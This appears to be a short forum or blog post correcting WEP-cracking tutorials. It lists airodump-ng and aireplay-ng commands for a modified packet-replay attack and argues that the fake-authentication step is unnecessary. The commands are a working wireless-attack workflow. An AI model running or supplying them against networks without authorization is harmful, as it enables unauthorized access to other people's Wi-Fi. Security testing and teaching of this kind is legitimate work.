Header Ads

FYI. Modified Packet Replay attack fault!! (WEP-cracking)



I found one faulty line in my tread about the Modified Packet Replay attack (the all in one tread), but i was surprised to find the exact same error in most of the tuts out here..

So, i´m just going to inform you all about this.. This is what most tuts look like

airodump-ng -w capture --bssid 11:22:33:44:55:66 -c 1 mon0

aireplay-ng -1 0 -a 11:22:33:44:55:66 mon0
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff: -b 11:22:33:44:55:66 mon0


In this particular attack, you are replaying a packet from an existing wireless connection. That existing wireless connection is already authenticated so you don't need to duplicate it.

Regarding to the Wiki on the Aircrack site you dont need a fake auth when doing a Modified Packet Replay attack

I've tested and it works without the fake auth

http://www.aircrack-ng.org/doku.php?id=i...ket_replay

//Happy hacking
Powered by Blogger.